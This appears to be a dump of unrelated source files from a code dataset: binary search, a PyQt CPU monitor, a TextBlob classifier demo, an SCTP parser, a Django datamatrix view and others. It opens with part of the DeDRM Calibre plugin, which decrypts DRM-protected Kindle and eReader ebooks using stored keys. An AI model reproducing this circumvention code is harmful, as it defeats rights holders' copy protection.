True\n # store the new successful keys in the defaults\n print(\"{0} v{1}: Saving {2} new {3}\".format(PLUGIN_NAME, PLUGIN_VERSION, len(newkeys), \"key\" if len(newkeys)==1 else \"keys\"))\n i = 1\n for keyvalue in newkeys.values():\n while \"kindle_key_{0:d}_{1:d}\".format(int(time.time()), i) in dedrmprefs['kindlekeys']:\n i = i + 1\n dedrmprefs.addnamedvaluetoprefs('kindlekeys',\"kindle_key_{0:d}_{1:d}\".format(int(time.time()), i),keyvalue)\n dedrmprefs.writeprefs()\n except Exception as e:\n traceback.print_exc()\n pass\n if not decoded:\n #if you reached here then no luck raise and exception\n print(\"{0} v{1}: Ultimately failed to decrypt after {2:.1f} seconds. Read the FAQs at noDRM's repository: https://github.com/noDRM/DeDRM_tools/blob/master/FAQs.md\".format(PLUGIN_NAME, PLUGIN_VERSION,time.time()-self.starttime))\n raise DeDRMError(\"{0} v{1}: Ultimately failed to decrypt after {2:.1f} seconds. Read the FAQs at noDRM's repository: https://github.com/noDRM/DeDRM_tools/blob/master/FAQs.md\".format(PLUGIN_NAME, PLUGIN_VERSION,time.time()-self.starttime))\n\n of = self.temporary_file(book.getBookExtension())\n book.getFile(of.name)\n of.close()\n book.cleanup()\n return of.name\n\n\n def eReaderDecrypt(self,path_to_ebook):\n\n import prefs\n import erdr2pml\n\n dedrmprefs = prefs.DeDRM_Prefs()\n # Attempt to decrypt epub with each encryption key (generated or provided).\n for keyname, userkey in dedrmprefs['ereaderkeys'].items():\n print(\"{0} v{1}: Trying Encryption key {2:s}\".format(PLUGIN_NAME, PLUGIN_VERSION, keyname))\n of = self.temporary_file(\".pmlz\")\n\n # Give the userkey, ebook and TemporaryPersistent file to the decryption function.\n result = erdr2pml.decryptBook(path_to_ebook, of.name, True, codecs.decode(userkey,'hex'))\n\n of.close()\n\n # Decryption was successful return the modified PersistentTemporary\n # file to Calibre's import process.\n if result == 0:\n print(\"{0} v{1}: Successfully decrypted with key {2:s} after {3:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION,keyname,time.time()-self.starttime))\n return of.name\n\n print(\"{0} v{1}: Failed to decrypt with key {2:s} after {3:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION,keyname,time.time()-self.starttime))\n\n print(\"{0} v{1}: Ultimately failed to decrypt after {2:.1f} seconds. Read the FAQs at noDRM's repository: https://github.com/noDRM/DeDRM_tools/blob/master/FAQs.md\".format(PLUGIN_NAME, PLUGIN_VERSION,time.time()-self.starttime))\n raise DeDRMError(\"{0} v{1}: Ultimately failed to decrypt after {2:.1f} seconds. Read the FAQs at noDRM's repository: https://github.com/noDRM/DeDRM_tools/blob/master/FAQs.md\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n\n\n def run(self, path_to_ebook):\n\n # make sure any unicode output gets converted safely with 'replace'\n sys.stdout=utilities.SafeUnbuffered(sys.stdout)\n sys.stderr=utilities.SafeUnbuffered(sys.stderr)\n\n print(\"{0} v{1}: Trying to decrypt {2}\".format(PLUGIN_NAME, PLUGIN_VERSION, os.path.basename(path_to_ebook)))\n self.starttime = time.time()\n\n booktype = os.path.splitext(path_to_ebook)[1].lower()[1:]\n if booktype in ['prc','mobi','pobi','azw','azw1','azw3','azw4','tpz','kfx-zip']:\n # Kindle/Mobipocket\n decrypted_ebook = self.KindleMobiDecrypt(path_to_ebook)\n elif booktype == 'pdb':\n # eReader\n decrypted_ebook = self.eReaderDecrypt(path_to_ebook)\n pass\n elif booktype == 'pdf':\n # Adobe PDF (hopefully) or LCP PDF\n decrypted_ebook = self.PDFDecrypt(path_to_ebook)\n pass\n elif booktype == 'epub':\n # Adobe Adept, PassHash (B&N) or LCP ePub\n decrypted_ebook = self.ePubDecrypt(path_to_ebook)\n else:\n print(\"Unknown booktype {0}. Passing back to calibre unchanged\".format(booktype))\n return path_to_ebook\n print(\"{0} v{1}: Finished after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION,time.time()-self.starttime))\n return decrypted_ebook\n\n def is_customizable(self):\n # return true to allow customization via the Plugin->Preferences.\n return True\n\n def config_widget(self):\n import config\n return config.ConfigWidget(self.plugin_path, self.alfdir)\n\n def save_settings(self, config_widget):\n config_widget.save_settings()\n","sub_path":"DeDRM_plugin/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":51473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"526640968","text":"#!/usr/bin/python\n\n# Open a file\nfr = open(\"data.csv\")\nfw = open(\"item_names.txt\", \"w\")\n\nfor line in fr:\n temp = line.split(',')\n if temp[0] == \"\\r\\n\":\n x = 0\n else:\n #must manually fix dual kamas prime\n fw.write(temp[0].split(' ')[0] + \" \" + temp[0].split(' ')[1] + \"\\n\");\n","sub_path":"db/python/gear_names.py","file_name":"gear_names.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"636740739","text":"#\n# Binary Search - AlgoExpert\n\n# O(log(n)) time | O(log(n))) space\ndef binarySearch(array, target):\n return binarySearchHelper(array, target, 0, len(array) - 1)\n\n\ndef binarySearchHelper(array, target, left, right):\n if left > right:\n return -1\n middle = (left + right) // 2\n potentialMatch = array[middle]\n if target == potentialMatch:\n return middle\n elif target < potentialMatch:\n return binarySearchHelper(array, target, left, middle - 1)\n else:\n return binarySearchHelper(array, target, middle + 1, right)\n\n\n# O(log(n)) time | O(1) space\ndef binarySearch2(array, target):\n return binarySearchHelper2(array, target, 0, len(array) - 1)\n\n\ndef binarySearchHelper2(array, target, left, right):\n while left <= right:\n middle = (left + right) // 2\n potentialMatch = array[middle]\n if target == potentialMatch:\n return middle\n elif target < potentialMatch:\n right = middle - 1\n else:\n left = middle + 1\n return -1\n\n\nimport unittest\n\n\nclass TestProgram(unittest.TestCase):\n def test_case_1(self):\n self.assertEqual(binarySearch([0, 1, 21, 33, 45, 45, 61, 71, 72, 73], 33), 3)\n\n def test_case_2(self):\n self.assertEqual(binarySearch2([0, 1, 21, 33, 45, 45, 61, 71, 72, 73], 33), 3)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"challenge_expert_probs/Python/ez/9ez_binary_search.py","file_name":"9ez_binary_search.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"521706908","text":"#编写一个程序,实现“全部替换”功能,程序实现如图\n#别忘了 字符串 replace(old, new[, count])     \n# 把字符串中的 old 子字符串替换成 new 子字符串,如果 count 指定,则替换不超过 count 次\n#思路 每行每行的遍历 找到替换的单词 replace后 换过的行和没换过的全存到一个列表里 然后 文件用writelines重新写入\ndef file_replace(file_name, origin, replace):\n count = 0 #计数替换的单词数\n content = []#空列表 为了写入用\n f_read = open(file_name)\n for eachline in f_read:\n if origin in eachline: # 判断需要改的字符串或单词是否在这一行中\n count1 = eachline.count(origin)# 每行中需要改的字符串的个数\n eachline = eachline.replace(origin, replace) # 改字符串\n count += count1 # 自加每行的个数\n content.append(eachline) # 加到列表中去\n\n decide = input('\\n文件中共有%s个【%s】\\n您确定要把所有的【%s】替换成【%s】吗?\\n[YES/NO]:' % (count, origin, origin, replace))\n if decide == 'YES' or 'yes':\n f_write = open(file_name, 'w')\n f_write.writelines(content)\n f_write.close()\n print('更改成功')\n else:\n print('不更改')\n f_read.close()\n\nfile_name = input('请输入文件名:')\norigin = input('请输入要替换的单词或字符:')\nreplace = input('请输入新的单词或字符:')\nfile_replace(file_name, origin, replace)","sub_path":"29.4.py","file_name":"29.4.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"476482838","text":"from PyQt6 import QtWidgets, QtCore\nimport pyqtgraph as pg\nimport sys\nimport time\nfrom echo_client_cpu_class import *\n\n\nclass Widget(QtWidgets.QWidget):\n\n def __init__(self, interval=2.0, timewindow=50):\n \"\"\" interval,timewindow:seconds\"\"\"\n super(Widget, self).__init__()\n self._interval = interval\n self._timewindow = timewindow\n\n self.button = QtWidgets.QPushButton(\n text=\"Monitoring Off, Press the Button to Start\",\n checkable=True)\n self.button.clicked.connect(self.monitoring)\n\n vlay = QtWidgets.QVBoxLayout(self) # vertically arranged widgets\n vlay.addWidget(self.button)\n\n self.graphWidget = pg.PlotWidget()\n\n # Add Background colour to white\n self.graphWidget.setBackground('w')\n # Add Title\n self.graphWidget.setTitle(\n \"The Live Data of CPU Utilization as a Percentage \", color=\"b\", size=\"15pt\")\n # Add Axis Labels\n styles = {\"color\": \"black\", \"font-size\": \"15px\"}\n self.graphWidget.setLabel(\"left\", \"CPU(%)\", **styles)\n\n axis = pg.DateAxisItem(orientation='bottom')\n self.graphWidget.setAxisItems({\"bottom\": axis})\n self.graphWidget.setLabel(\n \"bottom\", f\"Time (interval:{self._interval}s timewindow:{self._timewindow}s)\", **styles)\n\n # Add legend\n self.graphWidget.addLegend()\n # Add grid\n self.graphWidget.showGrid(x=True, y=True)\n\n vlay.addWidget(self.graphWidget)\n\n self.i = 0\n curtime = time.time()\n self.graphWidget.setXRange(\n curtime, curtime+self._timewindow, padding=0)\n\n self.x = []\n self.cpu = []\n self.data_line = self.plot([], [], \"CPU(%)\", 'b')\n\n self.timer = QtCore.QTimer()\n self.timer.setInterval(int(self._interval*1000))\n self.timer.timeout.connect(self.update_plot_data)\n self.monitoring_on = False\n # client\n self.client = clientcpu(host=\"localhost\", port=5000)\n self.client.connect()\n self.setWindowTitle(f'CPU Utilization as a Percentage (Server Host: {self.client.host} Port: {self.client.port})')\n\n\n def plot(self, x, y, plotname, color):\n pen = pg.mkPen(color=color)\n return self.graphWidget.plot(x, y, name=plotname, pen=pen,\n symbol='o', symbolSize=5, symbolBrush=(color))\n\n def update_plot_data(self):\n cpu_percent = self.client.receive_data()\n if (self.i == 0.0):\n curtime = time.time()\n self.graphWidget.setXRange(\n curtime, curtime+self._timewindow, padding=0)\n\n if self.i < self._timewindow:\n self.x.append(time.time()) # Add a new value\n self.cpu.append(cpu_percent) # Add a new value.\n self.i += self._interval\n else:\n # Once enough data is captured, append the newest data point and delete the oldest\n curtime = time.time()\n self.x.append(curtime) # Add a new value\n self.cpu.append(cpu_percent)\n del self.x[0]\n del self.cpu[0]\n self.graphWidget.setXRange(\n curtime-self._timewindow, curtime, padding=0)\n\n self.data_line.setData(self.x, self.cpu) # Update the data.\n\n def monitoring(self):\n if self.monitoring_on == False:\n self.timer.start()\n self.monitoring_on = True\n self.button.setText(\"Monitoring On, Press the Button to Stop\")\n else:\n self.timer.stop()\n self.monitoring_on = False\n self.button.setText(\"Monitoring Off, Press the Button to Start\")\n\n def closeEvent(self, event):\n self.client.disconnect()\n \nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n w = Widget(interval=0.5, timewindow=25.0)\n w.show()\n sys.exit(app.exec())\n","sub_path":"notebook/code/python/pyqt6-gui-qtime_client.py","file_name":"pyqt6-gui-qtime_client.py","file_ext":"py","file_size_in_byte":3902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"154791131","text":"from itertools import permutations\nimport numpy as np #for vectorized operations\n\ndef factorial(n):\n if n == 0:\n return 1\n else:\n return n * factorial(n-1)\n\nsdc = [4,2,1]\nidc = [4,3]\n\nnum_permutations = factorial(len(idc))\nprint(num_permutations)\n\nperm_idc = permutations(idc)\n\nposs_differences = np.zeros(shape=(num_permutations,2))\n\nfor i in range(num_permutations):\n\ttry:\n\t\tpermutation = np.array(next(perm_idc))\n\t\tprint(permutation)\n\t\tposs_differences[i] = np.array(sdc) - permutation\n\texcept:\n\t\tprint('iterator exhausted')\n\n\n\nprint(poss_differences)\n","sub_path":"foveatedWord/untitled.py","file_name":"untitled.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"145099439","text":"from typing import List\n\n\nraw = input().strip().split(' ')\n\na = []\nfor i in range(3):\n raw = input().strip().split(' ')\n a.append([int(x) for x in raw])\n a[i].sort()\n\nm = 1\nfor i in range(3):\n for item in a[i]:\n if item > m:\n m = item\n\n\ndef next(last: List, cur: List) -> List:\n point = last[0]\n count = len(last)\n for i in range(point + 1, m + 1):\n if (cur.count(i) >= count):\n return [i for j in range(count)][:]\n for i in range(1, point + 1):\n if (cur.count(i) >= count + 1):\n return [i for j in range(count + 1)][:]\n return None\n\n\nlast = [0]\nlast_index = 0\n\nrunning = True\nwhile running:\n for i in range(3):\n cur_list = a[i]\n cur = next(last, cur_list)\n\n if (last_index == i):\n cur = next([0], cur_list)\n # print(\"[debug] #{}: new round\".format(i + 1))\n elif (cur == None):\n # print(\"[debug] #{}: pass\".format(i + 1))\n continue\n\n point = cur[0]\n count = len(cur)\n for j in range(count):\n cur_list.remove(point)\n\n last = cur[:]\n last_index = i\n # print(\"[debug] #{}: {}\".format(i + 1, cur))\n\n if (len(cur_list) == 0):\n # print(\"[debug] #{}: won\".format(i + 1))\n print(i + 1)\n running = False\n break\n","sub_path":"contest/chuanzhicup/2021-c3/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"344293315","text":"from textblob.classifiers import NaiveBayesClassifier\n\ntrain = [\n ('I love this sandwich.', 'positive'),\n ('This is an amazing place!', 'positive'),\n ('I feel very good about these beers.', 'positive'),\n ('This is my best work.', 'positive'),\n (\"What an awesome view\", 'positive'),\n ('I do not like this restaurant', 'negative'),\n ('I am tired of this stuff.', 'negative'),\n (\"I can't deal with this\", 'negative'),\n ('He is my sworn enemy!', 'negative'),\n ('My boss is horrible.', 'negative')\n]\n\nclassifier = NaiveBayesClassifier(train)\n\nprint(\"Classifying some examples:\")\nexample1 = \"These burgers are amazing\"\nprint(example1, \":\", classifier.classify(example1))\nexample2 = \"I do not like pizza\"\nprint(example2, \":\", classifier.classify(example2))\nprint()\n\ntest = [\n ('The beer was good.', 'positive'),\n ('I do not enjoy my job', 'negative'),\n (\"I ain't feeling dandy today.\", 'negative'),\n (\"I feel amazing!\", 'positive'),\n ('Gary is a friend of mine.', 'positive'),\n (\"I can't believe I'm doing this.\", 'negative')\n]\n\nprint(\"Accuracy of classifier on test set: {0:.2f}\".format(\n classifier.accuracy(test)))\nprint()\n\n# print(classifier.show_informative_features())\n\n# Loading data from json file and creating new NB classifier\nwith open('data.json', 'r') as fp:\n cl = NaiveBayesClassifier(fp, format='json')\n\nprint(\"Classifying some examples:\")\nexample1 = \"This is an amazing library!\"\nprint(example1, \":\", cl.classify(example1))\nexample2 = \"This one's a doozy.\"\nprob_dist = cl.prob_classify(example2)\nprint(example2, \":\", prob_dist.max())\nprint(\"Probability positive:\", round(prob_dist.prob(\"pos\"), 2))\nprint(\"Probability negative:\", round(prob_dist.prob(\"neg\"), 2))\nprint()\n\n# Classifying textblobs\nfrom textblob import TextBlob\nblob = TextBlob(\"The beer is good. But the hangover is horrible.\", classifier=cl)\n#print(blob.classify())\n\nfor s in blob.sentences:\n print(s, \":\", end=' ')\n print(s.classify())\nprint()\n\n# Evaluating classifiers\nprint(\"Accuracy: {0:.2f}\".format(classifier.accuracy(test)))\nprint(classifier.show_informative_features(5))\n\n# Updating Classifiers with new data\nnew_data = [('She is my best friend.', 'pos'),\n (\"I'm happy to have a new friend.\", 'pos'),\n (\"Stay thirsty, my friend.\", 'pos'),\n (\"He ain't from around here.\", 'neg')]\nclassifier.update(new_data)\nprint(\"Accuracy: {0:.2f}\".format(classifier.accuracy(test)))\n","sub_path":"machine_learning/naive_bayes_classifier/naivebayes.py","file_name":"naivebayes.py","file_ext":"py","file_size_in_byte":2443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"113832533","text":"\"\"\"\nSCTP Socket State Parser\n========================\n\nParsers provided by this module include:\n\nSCTPEps - file ``/proc/net/sctp/eps``\n-------------------------------------\n\"\"\"\n\nfrom insights import Parser, parser\nfrom insights.parsers import SkipException, ParseException\nfrom . import keyword_search\nfrom insights.specs import Specs\n\n\n@parser(Specs.sctp_eps)\nclass SCTPEps(Parser):\n \"\"\"\n This parser parses the content of ``/proc/net/sctp/eps`` file.\n It returns a list of dictionaries. The dictionary contains detail\n information of individual SCTP endpoint, which includes Endpoints, Socket,\n Socket type, Socket State, hash bucket, bind port, UID, socket inodes,\n Local IP address.\n\n Typical contents of ``/proc/net/sctp/eps`` file are::\n\n ENDPT SOCK STY SST HBKT LPORT UID INODE LADDRS\n ffff88017e0a0200 ffff880300f7fa00 2 10 29 11165 200 299689357 10.0.0.102 10.0.0.70\n ffff880612e81c00 ffff8803c28a1b00 2 10 30 11166 200 273361203 10.0.0.102 10.0.0.70 172.31.1.2\n\n Output data is stored in the dictionary format\n\n Examples:\n >>> type(sctp_info)\n <class 'insights.parsers.sctp.SCTPEps'>\n >>> sorted(sctp_info.sctp_local_ports) == sorted(['11165', '11166'])\n True\n >>> sorted(sctp_info.sctp_local_ips) == sorted(['10.0.0.102', '10.0.0.70', '172.31.1.2'])\n True\n >>> sorted(sctp_info.search(local_port=\"11165\")) == sorted([{'endpoints': 'ffff88017e0a0200', 'socket': 'ffff880299f7fa00', 'sk_type': '2', 'sk_state': '10', 'hash_bkt': '29', 'local_port': '11165', 'uid': '200', 'inode': '299689357', 'local_addr': ['10.0.0.102', '10.0.0.70']}])\n True\n >>> len(sctp_info.search(local_port=\"11165\")) == 1\n True\n >>> len(sctp_info.search(endpoints=\"ffff88017e0a0200\")) == 1\n True\n >>> sctp_info.sctp_eps_ips\n {'ffff88017e0a0200': ['10.0.0.102', '10.0.0.70'], 'ffff880612e81c00': ['10.0.0.102', '10.0.0.70', '172.31.1.2']}\n \"\"\"\n\n def parse_content(self, content):\n if (not content) or (not self.file_path):\n raise SkipException(\"No Contents\")\n\n COLUMN_IDX = {\n 'ENDPT': 'endpoints',\n 'SOCK': 'socket',\n 'STY': 'sk_type',\n 'SST': 'sk_state',\n 'HBKT': 'hash_bkt',\n 'LPORT': 'local_port',\n 'UID': 'uid',\n 'INODE': 'inode',\n 'LADDRS': 'local_addr'\n }\n\n self.data = []\n exp_column = COLUMN_IDX.keys()\n self._sctp_local_ports = []\n self._sctp_local_ips = set([])\n self._sctp_eps_ips = {}\n for line in content:\n row = {}\n line = line.strip()\n line = line.split()\n if (\"LPORT\" in line):\n if len(line) == len(exp_column):\n columns = line\n else:\n raise ParseException(\"Contents are not compatible to this parser\".format(row))\n else:\n for idx, val in enumerate(columns):\n if val == \"ENDPT\":\n # Save endpoint\n _eps = line[idx]\n self._sctp_eps_ips[_eps] = []\n if val == \"LADDRS\":\n # Append multihomed ip address\n key = COLUMN_IDX[val]\n row[key] = []\n while (idx != len(line)):\n ip_addr = line[idx]\n row[key].append(ip_addr)\n self._sctp_local_ips.add(ip_addr)\n self._sctp_eps_ips[_eps].append(ip_addr)\n idx = idx + 1\n else:\n key = COLUMN_IDX[val]\n row[key] = line[idx]\n if key == 'local_port':\n self._sctp_local_ports.append(line[idx])\n self.data.append(row)\n\n @property\n def sctp_local_ports(self):\n \"\"\"\n (list): This function returns a list of SCTP ports if SCTP\n endpoints are created, else `[]`.\n \"\"\"\n return self._sctp_local_ports\n\n @property\n def sctp_local_ips(self):\n \"\"\"\n (list): This function returns a list of all local ip addresses\n if SCTP endpoints are created, else `[]`.\n \"\"\"\n return list(self._sctp_local_ips)\n\n @property\n def sctp_eps_ips(self):\n \"\"\"\n (dict): This function returns a dict of all endpoints and corresponding\n local ip addresses used by SCTP endpoints if SCTP endpoints are\n created, else `{}`.\n \"\"\"\n return self._sctp_eps_ips\n\n def search(self, **args):\n \"\"\"\n (list): This function return a list of all endpoints when args search matches,\n when args search do not match then it returns `[]`.\n \"\"\"\n return keyword_search(self.data, **args)\n","sub_path":"insights/parsers/sctp.py","file_name":"sctp.py","file_ext":"py","file_size_in_byte":5036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"487179771","text":"from Child import Child\nfrom Node import Node # noqa: I201\n\n# These nodes are used only in code completion.\n\nCOMPLETIONONLY_NODES = [\n # Expression.\n Node('CodeCompletionExpr', kind='Expr',\n children=[\n Child('Base', kind='Expr', is_optional=True),\n Child('PeriodOrParen', kind='Token',\n token_choices=[\n 'PeriodToken',\n 'PrefixPeriodToken',\n 'LeftParenToken',\n ],\n is_optional=True),\n Child('CodeCompletionToken', kind='Token'),\n ]),\n\n # Type.\n Node('CodeCompletionType', kind='Type',\n children=[\n Child('Base', kind='Type', is_optional=True),\n Child('Period', kind='Token',\n token_choices=[\n 'PeriodToken',\n 'PrefixPeriodToken',\n ],\n is_optional=True),\n Child('CodeCompletionToken', kind='Token'),\n ]),\n]\n","sub_path":"utils/gyb_syntax_support/CompletionOnlyNodes.py","file_name":"CompletionOnlyNodes.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"119135753","text":"from IPython.core.interactiveshell import InteractiveShell\nInteractiveShell.ast_node_interactivity = 'all'\nimport traceback\nimport json\nfrom mymodule import stats_word\n\nwith open(r'H:\\【自学Python】\\GitHub\\selfteaching-python-camp\\exercises\\1901010109\\d09\\tang300.json', 'rb') as f:\n text = f.read()\n text_str = text.decode( encoding='utf-8' )\n try:\n print( f\"文件里出现次数前100的汉字,降序排列:\" )\n for key,value in stats_word.stats_text_cn(text_str):\n print( key, value )\n except Exception as e:\n print( traceback.format_exc() )","sub_path":"exercises/1901010109/d09/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"640727695","text":"import urllib.request\r\nfrom bs4 import BeautifulSoup\r\nimport re\r\n\r\nurl = 'https://news.yahoo.co.jp/topics'\r\nua = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) '\\\r\n 'AppleWebKit/537.36 (KHTML, like Gecko) '\\\r\n 'Chrome/81.0.4044.138 Safari/537.36 '\r\n\r\ndef getkokunai(word):\r\n req = urllib.request.Request(url, headers={'User-Agent': ua})\r\n html = urllib.request.urlopen(req)\r\n soup = BeautifulSoup(html, \"html.parser\")\r\n \r\n topicsindex = soup.find('div', attrs={'class':'sc-jqCOkK gRKalU'})\r\n topics = topicsindex.find_all(\"li\")\r\n knlist = []\r\n\r\n for topic in topics:\r\n knlist.append(topic.find('a').contents[0].string)\r\n knlist.append(topic.find('a').attrs['href'])\r\n \r\n knlist = re.sub(r'(([^,]*,){1})', r'\\1\\n', str(knlist)) \r\n return knlist\r\n\r\n # print(trend.find('a').contents[2].string)\r\n # print(\"https://search.yahoo.co.jp\" + trend.find('a').attrs['href'])\r\n ","sub_path":"kokunai.py","file_name":"kokunai.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"126102556","text":"\n\n#calss header\nclass _YOLK():\n\tdef __init__(self,): \n\t\tself.name = \"YOLK\"\n\t\tself.definitions = [u'the yellow, middle part of an egg: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_yolk.py","file_name":"_yolk.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"150152073","text":"from .models import Datamatrix, Session\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom django.shortcuts import render\nfrom bs4 import BeautifulSoup\nimport requests\nimport uuid\n\nWEBHOOK_KEY = 'test_key'\n\nclass ImageWorker(APIView):\n\n def get(self, request):\n r = request.GET\n text = r.get('text')\n session_uuid = r.get('session_id')\n last = r.get('last')\n print(str(request))\n\n if text and session_uuid and (not last):\n s = Session.objects.get(uuid=session_uuid)\n DM = Datamatrix(text=text,session_id=s)\n DM.make_datamatrix()\n return Response({\"ok\": 'ok'})\n if last:\n s = Session.objects.get(uuid=session_uuid)\n DM = Datamatrix(text=text,session_id=s)\n DM.make_datamatrix()\n DM.make_zipfile()\n return Response({\"data\": {'session':s.uuid, 'zip': DM.zip_path}})\n\n\nclass SessionGenerator(APIView):\n\n def get(self,request):\n r = request.GET\n if (r.get('new_session') and (r.get('token') == WEBHOOK_KEY)):\n s = Session()\n s.uuid = str(uuid.uuid4())\n s.save()\n return Response({\"session_id\": s.uuid})\n else:\n return Response({\"error\": 'invalid_request'})\n","sub_path":"dm_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"222503953","text":"# Escreva um programa que leia um número inteiro qualquer e peça\n# para o usuário escolher qual será a base de conversão:\n# - 1 para binário\n# - 2 para octal\n# - 3 para hexadecimal\n\nnum = int(input('Digite um número inteiro: '))\n\nprint('''Escolha uma base para conversão:\n[1] Conversão para binário\n[2] Conversão para octal\n[3] Conversão para hexadecimal''')\n\nopção = int(input('Digite sua opção: '))\n\nif opção == 1:\n print('{} em binário é {}.'.format(num, bin(num)[2:]))\n\nelif opção == 2:\n print('{} em octal é {}'.format(num, oct(num)[2:]))\n\nelif opção == 3:\n print('{} em hexadecimal é {}'.format(num, hex(num)[2:]))\n\nelse:\n print('Digite 1, 2 ou 3 para que seja realizada alguma conversão!')\n","sub_path":"ex037.py","file_name":"ex037.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"323917199","text":"#!/usr/bin/python3\n\ndef isprime(n):\n if n == 1:\n return False\n for x in range(2, n):\n if n % x == 0:\n return False\n else:\n return True\n\ndef primes(n = 1):\n while(True):\t\t# loop forever\n if isprime(n): yield n # yield n to the statment calling 'primes', which prints n for n < 100, funcion picks back up after the yield function, i.e. n += 1\n n += 1\n\nfor n in primes():\n if n > 100: break\n print(n)\n\n","sub_path":"eg_generator.py","file_name":"eg_generator.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"307734581","text":"#!/usr/bin/env python\n\"\"\"Upgrade Cohesity Agents Using Python\"\"\"\n\n### usage: ./upgradeAgents.py -v 192.168.1.198 -u admin [-d local]\n\n### import pyhesity wrapper module\nfrom pyhesity import *\nfrom datetime import datetime\nfrom time import sleep\nimport codecs\n\n### command line arguments\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('-v', '--vip', type=str, default='helios.cohesity.com')\nparser.add_argument('-u', '--username', type=str, default='helios')\nparser.add_argument('-d', '--domain', type=str, default='local')\nparser.add_argument('-c', '--clustername', type=str, action='append')\nparser.add_argument('-mcm', '--mcm', action='store_true')\nparser.add_argument('-i', '--useApiKey', action='store_true')\nparser.add_argument('-pwd', '--password', type=str, default=None)\nparser.add_argument('-np', '--noprompt', action='store_true')\nparser.add_argument('-m', '--mfacode', type=str, default=None)\nparser.add_argument('-o', '--ostype', type=str, default=None)\nparser.add_argument('-x', '--execute', action='store_true')\nparser.add_argument('-s', '--showcurrent', action='store_true')\nparser.add_argument('-n', '--agentname', action='append', type=str)\nparser.add_argument('-l', '--agentlist', type=str)\nparser.add_argument('-k', '--skipwarnings', action='store_true')\nparser.add_argument('-r', '--refresh', action='store_true')\nparser.add_argument('-rt', '--timeout', type=int, default=35)\nparser.add_argument('-w', '--sleeptime', type=int, default=60)\nparser.add_argument('-t', '--throttle', type=int, default=12)\n\nargs = parser.parse_args()\n\nvip = args.vip\nusername = args.username\ndomain = args.domain\nclusternames = args.clustername\nmcm = args.mcm\nuseApiKey = args.useApiKey\npassword = args.password\nnoprompt = args.noprompt\nmfacode = args.mfacode\nostype = args.ostype\nshowcurrent = args.showcurrent\nexecute = args.execute\nagentnames = args.agentname\nagentlist = args.agentlist\nskipwarnings = args.skipwarnings\nrefresh = args.refresh\ntimeout = args.timeout\nsleeptime = args.sleeptime\nthrottle = args.throttle\n\n\n# gather server list\ndef gatherList(param=None, filename=None, name='items', required=True):\n items = []\n if param is not None:\n for item in param:\n items.append(item)\n if filename is not None:\n f = open(filename, 'r')\n items += [s.strip() for s in f.readlines() if s.strip() != '']\n f.close()\n if required is True and len(items) == 0:\n print('no %s specified' % name)\n exit()\n return items\n\n\nagentnames = gatherList(agentnames, agentlist, name='agents', required=False)\n\n# authenticate\napiauth(vip=vip, username=username, domain=domain, password=password, useApiKey=useApiKey, helios=mcm, prompt=(not noprompt), mfaCode=mfacode)\n\n# exit if not authenticated\nif apiconnected() is False:\n print('authentication failed')\n exit(1)\n\nnow = datetime.now()\ndateString = now.strftime(\"%Y-%m-%d-%H-%M-%S\")\n\nif mcm or vip.lower() == 'helios.cohesity.com':\n outfile = 'agentUpgrades-helios-%s.csv' % dateString\n if clusternames is None or len(clusternames) == 0:\n clusternames = [c['name'] for c in heliosClusters()]\nelse:\n cluster = api('get', 'cluster')\n clusternames = [cluster['name']]\n cluster = api('get', 'cluster')\n outfile = 'agentUpgrades-%s-%s.csv' % (cluster['name'], dateString)\n\nf = codecs.open(outfile, 'w')\nf.write('Cluster Name,Cluster Version,Agent Name,Agent Version,OS Type,OS Name,Status,Error Message\\n')\n\nreportNextSteps = False\n\nfor clustername in 